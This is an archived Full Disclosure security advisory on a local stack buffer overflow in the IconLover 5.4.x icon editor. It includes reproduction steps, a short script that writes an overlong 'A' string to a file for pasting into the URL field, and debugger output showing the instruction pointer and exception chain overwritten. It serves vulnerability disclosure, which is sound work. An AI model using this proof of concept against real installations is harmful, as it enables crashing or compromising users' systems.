[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] IconLover v5.4.5 - Stack Buffer Overflow Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2015-09-28 9:27:23
Message-ID: 560907FB.9040201 () vulnerability-lab ! com
[Download RAW message or body]

Document Title:
===============
IconLover v5.4.5 - Stack Buffer Overflow Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1609


Release Date:
=============
2015-09-28


Vulnerability Laboratory ID (VL-ID):
====================================
1609


Common Vulnerability Scoring System:
====================================
7.1


Product & Service Introduction:
===============================
IconLover is a powerful, yet easy to use icon editor for making your own icons for any \
operating system, including Windows, Mac OS, UNIX, Android and iOS.  It creates native Windows \
icons (ICO format) of all sizes, up to 768x768 used in Windows 10, and native MacOS icons (ICNS \
format) up to 1024x1024 pixels  (this size is used in the latest Mac OS X versions). \
UNIX/Linux, Android and iOS use icons in PNG format which is fully supported by IconLover - you \
can  create icons in this format from scratch or convert the existing Windows and Mac OS icons \
to PNG.

(Copy of the Homepage: http://www.aha-soft.com/iconlover/ ) 


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a buffer overflow vulnerability \
in the IconLover v5.4.2 and v5.4.5 software.


Vulnerability Disclosure Timeline:
==================================
2015-09-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
AHA-Soft
Product: IconLover - Software (Windows) 5.42 and 5.45


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A stack buffer overflow vulnerability has been discovered in the official in the IconLover \
v5.4.2 and v5.4.5 software. The local vulnerability allows to overwrite the registers of the \
software process to compromise the target system.

The vulnerability is located in the `File -> New Icon Lybrary` and `Lybrary -> Download` \
module. Local attackers are able to  include a malicious unicode payload as `URL` (input) to \
crash the software via stack buffer overflow vulnerability. Local attackers  are able to \
takeover the system process by escalate of privileges to compromise the local target system.

The security risk of the stack buffer overflow vulnerability is estimated as high with a cvss \
(common vulnerability scoring system) count of 7.1.  Exploitation of the vulnerability requires \
a low privilege system user account and no user interaction. Successful exploitation of the \
local vulnerability results in system compromise by elevation of privileges via overwrite of \
the registers.

Vulnerable Module(s):
			[+] File -> New Icon Lybrary > Lybrary -> Download

Vulnerable Input(s):
			[+] Website Adress (URL)


Proof of Concept (PoC):
=======================
The local buffer overflow software vulnerability can be exploited by local attackers with low \
privilege system user accounts and without user interaction. For security demonstration or to \
reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Copy a large unicode AAAA+... string from bof.txt to your clipboard
2. Run the IconLover.exe software
3. Click the File -> New Icon Lybrary option
4. Click the Lybrary and push the Download button 
5. Paste it the input Website Adress (URL) AAAA+... string click ok and hide 
6. Software will crash via stack buffer overflow. Now the attacker can overwrite the registers
7. Successful reproduce of the vulnerability!


--- Debug Logs [WinDBG] ---
Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=76db72cd esi=00000000 edi=00000000
eip=41414141 esp=0012f048 ebp=0012f068 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
41414141 ??              ???
0:000> !exchain
0012f05c: ntdll!RtlRaiseStatus+c8 (76db72cd)
0012fa88: 41414141
Invalid exception stack at 41414141
0:000> d 0012fa88
0012fa88  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fa98  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012faa8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fab8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fac8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fad8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fae8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012faf8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA


PoC: Exploit.pl
buffer = "\x41"*10000
file = open("bof.txt","w")
file.write(buffer)
file.close()
print "File Created"
print " Contact msk4@live.fr"


Security Risk:
==============
The security risk of the local stack buffer overflow vulnerability in the IconLover v5.4.5 \
software is estimated as high. (CVSS 7.1)


Credits & Authors:
==================
ZwX (http://zwx.fr/) [http://www.vulnerability-lab.com/show.php?user=ZwX]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed  or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable  in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab  or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for  consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,  \
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- \
                admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- \
                evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- \
                youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- \
                vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- \
vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to  electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by  Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website  is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact  (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.

				Copyright  © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic